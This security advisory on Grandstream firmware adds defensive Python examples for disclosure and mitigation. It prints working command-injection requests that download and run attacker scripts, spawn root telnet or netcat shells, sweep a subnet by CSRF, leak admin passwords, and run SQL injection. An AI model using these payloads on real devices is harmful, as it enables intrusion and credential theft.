Grandstream Exploits (vulnerabilities)
Published: 04/05/2019
Version: 3.0
Vendor: Grandstream (http://www.grandstream.com/)
Product: Audio/Video/VoIP/Routers/Security Cameras
Versions affected:
Pre-auth RCE:
GAC2500 -- F/W version: 1.0.3.35
GVC3202 -- F/W version: 1.0.3.51
GXP2200 -- F/W version: 1.0.3.27 (end of life product)
GXV3275 -- F/W version: 1.0.3.210
GXV3240 -- F/W version: 1.0.3.210
Product description:
Various networking and communication solutions.
Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat
The priority parameter of the getlogcat action is handed to a shell, so the
request above, sent with a valid session, injects a reboot. When an invalid
phonecookie value is supplied, the server correctly denies access to the API
endpoints:
Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat
Response:
===========================
HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49
Connection: close
Date: Tue, 04 Dec 2018 09:29:11 GMT
Server: IP Video Conferencing
Response=Error
Message=Authentication Required
Request (over-long phonecookie value; this is the variant that the CSRF proof
of concept below reuses):
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat
--------------------
--------------------
The following proof of concept shows how a malicious HTML page could be used to
attempt this via CSRF. Script running in a browser cannot set the Cookie header
on an XMLHttpRequest, so the PoC carries the over-long phonecookie value in the
Accept header instead:
<script>
// Sweep 10.0.0.0/24 and send the getlogcat command injection to every host.
var payload = "/manager?action=getlogcat&region=maintenance&tag=&priority=;" +
    "{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;" +
    "&time=1543909525160";
// Over-long phonecookie value, sent in a header that script is allowed to set.
var fakeCookie = "phonecookie=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";";
for (var i = 0; i < 254; i++) {
  (function (i) {
    var oReq = new XMLHttpRequest();
    oReq.open("GET", "http://10.0.0." + i + payload);
    oReq.setRequestHeader("Accept", fakeCookie);
    oReq.send();
  })(i);
}
</script>
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 179
Connection: close
Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin
{"jsonrpc":"2.0","id":127,"method":"call","params":
["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
/ # id
uid=0(root) gid=0(root)
/ #
This functionality is only exposed in the UI to the admin account, but the
'user' account can still call the API endpoint directly. In addition, the
'user' account can retrieve the admin password in plaintext (along with the
rest of the device settings) with the following request, and then simply log
in as admin.
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 123
Connection: close
Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user
{"jsonrpc":"2.0","id":7,"method":"call","params":
["c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 9574
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change
_required":"1","ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":
"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM
9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L
Vd@>.Wf8]V\\
N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web
_port":"443"
[...]
Grandstream's GWN7610 (wireless access point) firmware version 1.0.8.9 and prior
is vulnerable to remote code execution via a post-auth command injection.
Request:
===========================
POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 177
Connection: close
Cookie: userid=817309838e44d88e62534d563598e60a; user=admin
{"jsonrpc":"2.0","id":127,"method":"call","params":
["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
Request:
===========================
POST /ubus/uci.get HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Length: 123
Connection: close
Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user
{"jsonrpc":"2.0","id":7,"method":"call","params":
["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 3973
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
syslog_uri":"10.0.0.125","log_level":"7"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","country":"840","applied_patch":"1","
admin_password":"Password1","user_password":"Password1","pairing_key"
[...]
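The two GWN findings above, an admin-only ubus method that any valid session can call and a filename that is spliced into a shell command, modelled in a small dispatcher next to a hardened one. This is an added example for this page, not Grandstream's ubus or uci code: the session ids, object and method names and config keys are the ones visible in the requests, while the session roles, the ACL table, the handler bodies and the /tmp-to-/www/nds copy are assumptions made for illustration.

```python
"""Model of the two GWN ubus findings above and of a hardened dispatcher.

Added example, not Grandstream's ubus/uci code. Session ids, object and
method names and config keys are the ones in the page's requests; the roles,
the ACL, the handler bodies and the /tmp -> /www/nds copy are assumptions."""
import re
import shlex

# Constructed sessions keyed by the id carried in the userid cookie / first RPC param.
SESSIONS = {
    "817309838e44d88e62534d563598e60a": "admin",
    "452a422c775b1176109da724a7bb5c44": "user",
}
# Constructed config section using the key names from the uci.get response.
CONFIG = {"grandstream": {"general": {
    "admin_password": "Password1", "user_password": "Password1",
    "pairing_key": "example-pairing-key", "web_port": "443"}}}
SECRET_KEYS = {"admin_password", "user_password", "pairing_key", "failover_key"}
# Assumed per-method ACL: the role check the vulnerable dispatcher lacks.
ACL = {("uci", "get"): {"admin", "user"},
       ("controller.icc", "update_nds_webroot_from_tmp"): {"admin"}}
FILENAME_OK = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")   # a plain basename, no '/'


def shell_commands(line):
    """Tokenise a line the way sh would and return one argv per command.
    (The inputs here consist of shlex word characters, so no whitespace_split.)"""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def dispatch_vulnerable(session_id, obj, method, params):
    """Any valid session reaches any method, and the filename is pasted into
    a shell line: the two weaknesses the requests on the page exploit."""
    if session_id not in SESSIONS:
        return {"error": "Access denied"}
    if (obj, method) == ("uci", "get"):
        return {"values": CONFIG.get(params["config"], {})}
    if (obj, method) == ("controller.icc", "update_nds_webroot_from_tmp"):
        line = f"cp '/tmp/{params['filename']}' /www/nds/"   # assumed sh -c line
        return {"status": 0, "commands": shell_commands(line)}
    return {"error": "Method not found"}


def redact(section):
    """Mask secret keys before returning config to a non-admin role."""
    return {name: {k: ("***" if k in SECRET_KEYS else v) for k, v in values.items()}
            for name, values in section.items()}


def dispatch_hardened(session_id, obj, method, params):
    """Role checked per method, secrets masked for non-admins, and the copy
    built as an argv from a validated basename rather than through a shell."""
    role = SESSIONS.get(session_id)
    if role is None or role not in ACL.get((obj, method), set()):
        return {"error": "Access denied"}
    if (obj, method) == ("uci", "get"):
        section = CONFIG.get(params["config"], {})
        return {"values": section if role == "admin" else redact(section)}
    if (obj, method) == ("controller.icc", "update_nds_webroot_from_tmp"):
        name = params["filename"]
        if not FILENAME_OK.fullmatch(name):
            return {"error": "Invalid filename"}
        return {"status": 0, "argv": ["cp", f"/tmp/{name}", "/www/nds/"]}
    return {"error": "Method not found"}


if __name__ == "__main__":
    user = "452a422c775b1176109da724a7bb5c44"
    payload = {"filename": "/hihi.html';telnetd -lsh;#"}
    print(dispatch_vulnerable(user, "controller.icc", "update_nds_webroot_from_tmp", payload))
    print(dispatch_hardened(user, "controller.icc", "update_nds_webroot_from_tmp", payload))
```

The session check on its own is not authorisation: the vulnerable dispatcher accepts the 'user' session for an admin-only method exactly as the page describes, and tokenising the assumed shell line shows the filename from the request becoming a second command. The hardened version needs all three changes (per-method role check, argv without a shell, basename validation) because each closes a different one of the findings.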
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.74
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
------------------------------
Request:
===========================
GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-p5555&loglevel=0 HTTP/1.1
Host: 10.0.0.135
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.135/Pages/syslog.html
cache-control: no-cache
context-type: text/xml;charset=utf-8
Content-Type: application/x-www-form-encodeURIComponent
If-Modified-Since: 0
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
----------------------------
----------------------------
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-1543933269; username=admin; user_id=0
action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0
action=backupUCMConfig&file-backup=backup_20181129_224405;x=$'busybox\x20nc\x20-l\x20-p\x201337\x20-e\x20sh';$x;.tar;+realtime
------------------------------
------------------------------
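The injected parameters above all rely on the same evasions: the getlogcat priority parameter uses bash brace expansion and $IFS to avoid spaces, the systemlog logserver parameter is double URL-encoded and uses $IFS, and the backupUCMConfig file-backup parameter uses ANSI-C $'...' quoting with \x20 for spaces. The normaliser below decodes those forms and flags any request parameter that carries a shell command separator once decoded. It is an added example for this page, not part of the advisory and not a Grandstream component; the sample request lines are the page's payloads written out as a web-server log would record them, and the parameter names it reports are the ones from those requests.

```python
"""Decode the evasion tricks seen in the injected parameters and flag them.

Added example, not code from the advisory or from Grandstream. Handles:
  - repeated URL encoding        %253B -> %3B -> ';'
  - $IFS / ${IFS} as whitespace  chmod$IFS+x$IFS/data/x.sh
  - bare bash brace expansion    {wget,URL,-O,/data/x.sh} -> wget URL -O /data/x.sh
  - ANSI-C quoting               $'busybox\\x20nc' -> busybox nc
"""
import re
from urllib.parse import unquote, urlsplit

_ANSI_C = re.compile(r"\$'((?:[^'\\]|\\.)*)'")
_IFS = re.compile(r"\$\{?IFS\}?")
_BRACE = re.compile(r"\{([^{}]*,[^{}]*)\}")        # bare {a,b,c}; no prefix/suffix handling
_SEPARATOR = re.compile(r"[;|`\n]|\$\(|&&|\|\|")   # command separators after decoding


def url_decode_fully(value, plus_is_space=False, limit=5):
    """Undo URL encoding until the string stops changing (catches %253B)."""
    if plus_is_space:                 # form bodies: '+' is a space; raw query strings: literal
        value = value.replace("+", " ")
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_shell(value):
    """Rewrite the evasion forms into the command the shell would actually run."""
    value = _ANSI_C.sub(
        lambda m: m.group(1).encode("latin-1").decode("unicode_escape"), value)
    value = _IFS.sub(" ", value)
    previous = None
    while previous != value:          # repeat so nested braces expand inside-out
        previous = value
        value = _BRACE.sub(lambda m: " ".join(m.group(1).split(",")), value)
    return value


def query_params(target_or_body, plus_is_space=False):
    """Split a request target's query (or a form body) into (name, decoded value)."""
    query = urlsplit(target_or_body).query if "?" in target_or_body else target_or_body
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            params.append((unquote(name), url_decode_fully(raw, plus_is_space)))
    return params


def find_command_injection(target_or_body, plus_is_space=False):
    """Return {param: normalised value} for each parameter that, once decoded,
    contains a shell command separator."""
    hits = {}
    for name, value in query_params(target_or_body, plus_is_space):
        normalised = normalize_shell(value)
        if _SEPARATOR.search(normalised):
            hits[name] = normalised
    return hits


# Constructed samples: the page's payloads as a web-server log would record them
# (method, request target or form body, whether '+' means space).
SAMPLE_REQUESTS = [
    ("GET", "/manager?action=getlogcat&region=maintenance&tag=&priority=;"
            "{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;"
            "/data/x.sh;&time=1543915668008", False),
    ("GET", "/goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-p5555"
            "&loglevel=0", False),
    ("POST", "action=backupUCMConfig&file-backup=backup_20181129_224405;"
             "x=$'busybox\\x20nc\\x20-l\\x20-p\\x201337\\x20-e\\x20sh';$x;.tar;+realtime", True),
    ("GET", "/manager?action=getlogcat&region=maintenance&tag=&priority=&time=1543915668008",
     False),
]


def triage(samples=SAMPLE_REQUESTS):
    """Run the detector over each sample; one dict of hits per request."""
    return [find_command_injection(target, plus) for _, target, plus in samples]


if __name__ == "__main__":
    for (method, target, _), hits in zip(SAMPLE_REQUESTS, triage()):
        print(method, target.split("&")[0], "->", hits or "clean")
```

Matching on the raw request line misses all three payloads (none contains a literal space and one contains no literal ';'), which is why the decoding happens before the separator check. The '+' handling is deliberate: the getlogcat payload relies on '+' reaching the shell literally in the query string, while in the UCM form body '+' is a space.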
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot noot",sqlite_version(),null;--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 258
Connection: close
Date: Tue, 04 Dec 2018 14:40:26 GMT
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null FROM sqlite_master--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 46541
Connection: close
Date: Tue, 04 Dec 2018 14:44:04 GMT
{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",
"members": "1001", "tmp": "2" }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "language_settings", "tmp": null }, { "extension": null, "group_name":
null, "members": "sqlite_sequence", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp_settings", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp6_settings", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
{ "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp":
null }, { "extension": null, "group_name": null, "members":
"typical_firewallsettings", "tmp": null }, { "extension": null, "group_name": null,
"members": "static_defense", "tmp": null }, { "extension": null, "group_name":
null, "members": "static_defense", "tmp": null }, { "extension": null,
"group_name": null, "members": "static_defense", "tmp": null }, { "extension":
null, "group_name": null, "members": "blacklist", "tmp": null }
[...]
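The listCodeblueGroup injection above reproduced against an in-memory SQLite database, next to the fix. This is an added example, not UCM code: the table, its single row and the query shape (an ORDER BY built from sidx and sord) are assumptions; the column names and the injected sord value are the ones in the request and response above. The backend is modelled as running each statement of the stacked query and concatenating the rows, which is the behaviour the page's response shows (the real group row followed by sqlite_master rows in the members column).

```python
"""The listCodeblueGroup sort-parameter injection against SQLite, with the fix.

Added example, not UCM code. Table, row and query shape are assumptions; the
column names and the injected sord value come from the request and response
above."""
import sqlite3


def fresh_db():
    """Constructed in-memory stand-in for the UCM database with one group."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE codeblue_group(
            extension TEXT, group_name TEXT, members TEXT, tmp TEXT);
        INSERT INTO codeblue_group VALUES ('2', 'apples', '1001', '2');
    """)
    return db


def run_stacked(db, sql):
    """Run each ';'-separated statement and concatenate the rows. This models
    the behaviour visible in the page's response, where the real group row is
    followed by rows of the injected SELECT. (Splitting on ';' is enough for
    these payloads; it is the modelled backend, not a general SQL splitter.)"""
    rows = []
    for statement in filter(str.strip, sql.split(";")):
        rows.extend(db.execute(statement).fetchall())
    return rows


def list_codeblue_group_vulnerable(db, sidx, sord, item_num=10, page=1):
    """sidx/sord are interpolated straight into ORDER BY, as the page shows."""
    sql = ("SELECT extension, group_name, members, tmp FROM codeblue_group "
           f"ORDER BY {sidx} {sord} LIMIT {item_num} OFFSET {(page - 1) * item_num}")
    return run_stacked(db, sql)


ALLOWED_SORT_COLUMNS = {"extension", "group_name", "members"}
ALLOWED_SORT_ORDER = {"asc", "desc"}


def list_codeblue_group_hardened(db, sidx, sord, item_num=10, page=1):
    """ORDER BY targets cannot be bound as parameters, so both are checked
    against an allow-list; the paging numbers are bound, and only one
    statement is ever executed."""
    sord = sord.lower()
    if sidx not in ALLOWED_SORT_COLUMNS or sord not in ALLOWED_SORT_ORDER:
        raise ValueError(f"rejected sort parameters: {sidx!r} {sord!r}")
    sql = ("SELECT extension, group_name, members, tmp FROM codeblue_group "
           f"ORDER BY {sidx} {sord} LIMIT ? OFFSET ?")
    item_num, page = int(item_num), int(page)
    return db.execute(sql, (item_num, (page - 1) * item_num)).fetchall()


# The second injected sord value from the page (the sqlite_master enumeration).
INJECTED_SORD = "asc;select null,null,tbl_name,null FROM sqlite_master--"

if __name__ == "__main__":
    db = fresh_db()
    print(list_codeblue_group_vulnerable(db, "extension", INJECTED_SORD))
    print(list_codeblue_group_hardened(db, "extension", "asc"))
```

Sort column and direction are the classic case where parameter binding does not apply, so the only safe construction is an allow-list of literal values; binding the LIMIT/OFFSET numbers and refusing stacked statements then removes the remaining surface.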
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.84
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
------------------------------
Remediation Steps:
Ensure all devices are up to date and running the latest firmware; turn on
automatic updates; change all default credentials on the devices for all accounts;
run the devices on a separate network from those accessing sensitive information;
disable access to all services that aren't required on the device; and upgrade
any end-of-life devices that are no longer receiving security updates.
The firmware versions that were released to address these findings include:
Please note that Trustwave has not verified all of the vendor-supplied fixes.
Revision History:
12/06/2018 : Vulnerabilities disclosed to vendor
02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202
03/01/2019 : Vendor announces firmware updates available for GWN7000
03/22/2019 : Advisory 1.0 published
03/27/2019 : Advisory 2.0 published
04/05/2019 : Advisory 3.0 published
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.